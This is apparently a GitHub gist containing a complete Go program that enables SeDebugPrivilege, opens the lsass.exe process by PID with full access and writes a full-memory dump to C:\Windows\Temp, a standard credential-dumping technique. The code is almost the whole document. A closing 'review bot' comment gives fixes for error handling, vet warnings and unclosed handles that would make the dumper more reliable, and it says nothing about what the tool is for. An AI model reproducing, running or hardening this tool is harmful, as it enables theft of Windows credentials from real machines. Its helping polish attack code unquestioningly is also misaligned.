Created
July 9, 2021 11:16
pwn1sher created this gist
Jul 9, 2021
@@ -0,0 +1,108 @@ package main import ( "flag" "fmt" "golang.org/x/sys/windows" "log" "syscall" ) const ( PROCESS_CREATE_PROCESS = 0x0080 PROCESS_CREATE_THREAD = 0x0002 PROCESS_DUP_HANDLE = 0x0040 PROCESS_QUERY_INFORMATION = 0x0400 PROCESS_QUERY_LIMITED_INFORMATION = 0x1000 PROCESS_SET_INFORMATION = 0x0200 PROCESS_SET_QUOTA = 0x0100 PROCESS_SUSPEND_RESUME = 0x0800 PROCESS_TERMINATE = 0x0001 PROCESS_VM_OPERATION = 0x0008 PROCESS_VM_READ = 0x0010 PROCESS_VM_WRITE = 0x0020 GENERIC_WRITE = 0x40000000 FILE_SHARE_WRITE = 0x00000002 CREATE_ALWAYS = 0x2 FILE_ATTRIBUTE_NORMAL = 0x80 DEBUG_WITH_FULL_MEMORY = 0x00000002 PROCESS_ALL_ACCESS = (PROCESS_CREATE_PROCESS | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_SET_INFORMATION | PROCESS_SET_QUOTA | PROCESS_SUSPEND_RESUME | PROCESS_TERMINATE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ) ) func EnablePrivilege(name string) error { // get current process token handle := windows.CurrentProcess() var token windows.Token err := windows.OpenProcessToken(handle, windows.TOKEN_ADJUST_PRIVILEGES|windows.TOKEN_QUERY, &token) if err != nil { fmt.Println("Failed to obtain current process token\n") } // lookup debug privilege debug := new(windows.LUID) err = windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(name), debug) if err != nil { fmt.Println("Failed to lookup \"%s\"\n", name) } // adjust token privilege privilege := windows.Tokenprivileges{ PrivilegeCount: 1, Privileges: [1]windows.LUIDAndAttributes{{ Luid: *debug, Attributes: windows.SE_PRIVILEGE_ENABLED, }}, } err = windows.AdjustTokenPrivileges(token, false, &privilege, 0, nil, nil) if err != nil { fmt.Println("Failed to enable %s with current process token\n", name) } return nil } func main() { // Enable Debug Privs ! 
EnablePrivilege("SeDebugPrivilege") pid := flag.Int("pid", 0, "Process ID of lsass.exe") flag.Parse() dbghelp := windows.NewLazySystemDLL("Dbghelp.dll") MiniDumpWriteDump := dbghelp.NewProc("MiniDumpWriteDump") var sa windows.SecurityAttributes //get handle to process pHandle, errOpenProcess := windows.OpenProcess(PROCESS_ALL_ACCESS, false, uint32(*pid)) if errOpenProcess != nil { log.Fatal(fmt.Sprintf("[!] Error calling OpenProcess: %s\n", errOpenProcess.Error())) } fmt.Println(fmt.Sprintf("[-] Successfully got a handle to process %d", *pid)) //create dump file path := "C:\\Windows\\Temp\\dump.dmp" fHandle, errCreateFile := windows.CreateFile(syscall.StringToUTF16Ptr(path), GENERIC_WRITE, FILE_SHARE_WRITE, &sa, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0) if errCreateFile != nil { log.Fatal(fmt.Sprintf("[!] Error calling CreateFile\n")) } fmt.Println(fmt.Sprintf("[-] Successfully got a handle to file %d", fHandle)) PID := uintptr(*pid) //dump memory with minidumpwritedump success, _, _ := MiniDumpWriteDump.Call(uintptr(pHandle), PID, uintptr(fHandle), DEBUG_WITH_FULL_MEMORY, 0, 0, 0) //if errMiniDump != nil { if success == 0 { log.Fatal(fmt.Sprintf("[!] Error calling MiniDumpWriteDump:\n")) } fmt.Println(fmt.Sprintf("[-] Dump Completed: %s", path)) //close handle to process windows.CloseHandle(pHandle) }
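Review bot: EnablePrivilege can never report failure: each `if err != nil` only prints and falls through, the closing `return nil` is unconditional, and main discards the result anyway, so after a failed token adjustment the program continues into OpenProcess and the error the user eventually sees points at the wrong step. Returning the wrapped error, e.g. `return fmt.Errorf("looking up privilege %q: %w", name, err)`, and checking it at the call site with `if err := EnablePrivilege("SeDebugPrivilege"); err != nil { log.Fatal(err) }` keeps the failure where it happened; note also that AdjustTokenPrivileges can succeed yet set ERROR_NOT_ALL_ASSIGNED when the privilege is not held by the token, which I believe the x/sys/windows wrapper does not surface, so a caller that relies on the privilege may want to verify it — please confirm against the wrapper. The messages pass format verbs to fmt.Println and wrap fmt.Sprintf inside log.Fatal/fmt.Println; `go vet` flags both, and `fmt.Printf`/`log.Fatalf` say the same thing directly. Finally, the token from OpenProcessToken and fHandle are never closed (only pHandle is), and the lastErr value of `MiniDumpWriteDump.Call` is discarded, so the `[!] Error calling MiniDumpWriteDump` line carries no reason; `ret, _, lastErr := MiniDumpWriteDump.Call(...)` with lastErr included in the log message would make that failure diagnosable.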